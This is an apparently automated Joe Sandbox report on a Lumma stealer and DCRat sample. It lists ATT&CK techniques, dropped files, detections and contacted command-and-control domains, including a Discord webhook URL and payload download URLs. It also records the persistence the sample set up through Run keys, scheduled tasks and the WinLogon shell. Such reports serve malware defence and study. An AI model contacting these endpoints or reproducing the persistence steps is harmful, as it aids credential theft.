Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	Login Hook	Login Hook	3 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4tXm5yPtiy.exe	58%	ReversingLabs	Win64.Spyware.Lummastealer
4tXm5yPtiy.exe	100%	Avira	HEUR/AGEN.1317356

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\DqsZwsEl.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\MQUzRRxE.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	100%	Avira	HEUR/AGEN.1323342
C:\Edge\msedge.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\NKJXVMBv.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\DqsZwsEl.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\UXzpIjDH.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\TUtPMNAm.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\MQUzRRxE.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GfhqKgmo.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\JlazcluE.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\NKJXVMBv.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\EVLpKOHn.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DqsZwsEl.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EVLpKOHn.log	8%	ReversingLabs
C:\Users\user\Desktop\GfhqKgmo.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\JlazcluE.log	8%	ReversingLabs
C:\Users\user\Desktop\MQUzRRxE.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NKJXVMBv.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NhvHKDkY.log	29%	ReversingLabs
C:\Users\user\Desktop\TUtPMNAm.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\UXzpIjDH.log	8%	ReversingLabs
C:\Users\user\Desktop\VPYFfuwr.log	29%	ReversingLabs
C:\Users\user\Desktop\VltWWbmg.log	8%	ReversingLabs
C:\Users\user\Desktop\WpXNITDI.log	29%	ReversingLabs
C:\Users\user\Desktop\XmyVeTRC.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eGTFsMJp.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\fZXNGngO.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\iacMOeMk.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\rWRTdVVu.log	29%	ReversingLabs
C:\Users\user\Desktop\uIZJMPyD.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wDtsBZWh.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\zrKsasrd.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\kdmapper.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\physmeme.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://help.steampowered.com/	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
offeviablwke.site	104.21.84.213	true	true	unknown
steamcommunity.com	104.102.49.254	true	false	unknown
file.garden	188.114.96.3	true	false	unknown
fossillargeiw.shop	unknown	unknown	true	unknown
strappystyio.shop	unknown	unknown	true	unknown
tiddymarktwo.shop	unknown	unknown	true	unknown
coursedonnyre.shop	unknown	unknown	true	unknown
surveriysiop.shop	unknown	unknown	true	unknown
captainynfanw.shop	unknown	unknown	true	unknown
tearrybyiwo.shop	unknown	unknown	true	unknown
zelensky.top	unknown	unknown	true	unknown
appleboltelwk.shop	unknown	unknown	true	unknown
tendencerangej.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
coursedonnyre.shop	true		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin	false		unknown
https://offeviablwke.site/api	true		unknown
strappystyio.shop	true		unknown
tearrybyiwo.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin	false		unknown
captainynfanw.shop	true		unknown
fossillargeiw.shop	true		unknown
tiddymarktwo.shop	true		unknown
surveriysiop.shop	true		unknown
tendencerangej.shop	true		unknown
appleboltelwk.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.co	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://player.vimeo.com	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 0000001F.00000002.2016540956.000001E66D0F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binrc	curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://medal.tv	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microso	powershell.exe, 0000001F.00000002.2033274385.000001E66D2E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top	wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO	4tXm5yPtiy.exe	false		unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://auth.gg/	4tXm5yPtiy.exe	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binp.F	curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/	msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://surveriysiop.shop/api02	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php	wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:	curl.exe, 00000007.00000002.1504104457.000001FB23F70000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steam.tv/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://offeviablwke.site/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/license	4tXm5yPtiy.exe	false		unknown
http://www.houseindustries.com/licenseBurbank	4tXm5yPtiy.exe	false		unknown
https://www.google.coN	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.comhttp://www.talleming.comHouse	4tXm5yPtiy.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin:l	curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sketchfab.com	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://tiddymarktwo.shop/api(3	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:27060	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:	curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/licenseCopyright	4tXm5yPtiy.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://coursedonnyre.shop/api	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://offeviablwke.site:443/api	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/p3W	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://strappystyio.shop/api	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/	RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binM6	curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	file.garden	European Union	13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
104.21.84.213	offeviablwke.site	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522831
Start date and time:	2024-09-30 18:24:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	66
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4tXm5yPtiy.exe renamed because original name is a hash value
Original Sample Name:	a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@85/66@18/4
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msedge.exe, PID 1872 because it is empty
Execution Graph export aborted for target msedge.exe, PID 3848 because it is empty
Execution Graph export aborted for target msedge.exe, PID 4584 because it is empty
Execution Graph export aborted for target msedge.exe, PID 4648 because it is empty
Execution Graph export aborted for target msedge.exe, PID 6872 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3532 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6708 because it is empty
Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 2940 because it is empty
Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 3148 because it is empty
Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 3908 because it is empty
Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 5652 because it is empty
Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 6892 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 4tXm5yPtiy.exe

Simulations

Behavior and APIs

Time	Type	Description
12:25:32	API Interceptor	3x Sleep call for process: RegAsm.exe modified
12:25:51	API Interceptor	53x Sleep call for process: powershell.exe modified
12:26:02	API Interceptor	2x Sleep call for process: wCnmgKwwXYQbWeNvWeCCOp.exe modified
12:26:12	API Interceptor	1x Sleep call for process: msedge.exe modified
18:25:48	Task Scheduler	Run new task: wCnmgKwwXYQbWeNvWeCCOp path: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:25:48	Task Scheduler	Run new task: wCnmgKwwXYQbWeNvWeCCOpw path: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:25:50	Task Scheduler	Run new task: msedge path: "C:\Edge\msedge.exe"
18:25:50	Task Scheduler	Run new task: msedgem path: "C:\Edge\msedge.exe"
18:25:52	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:26:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:26:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:26:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:26:26	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:26:35	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:26:52	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
18:27:00	Autostart	Run: WinLogon Shell "C:\Edge\msedge.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
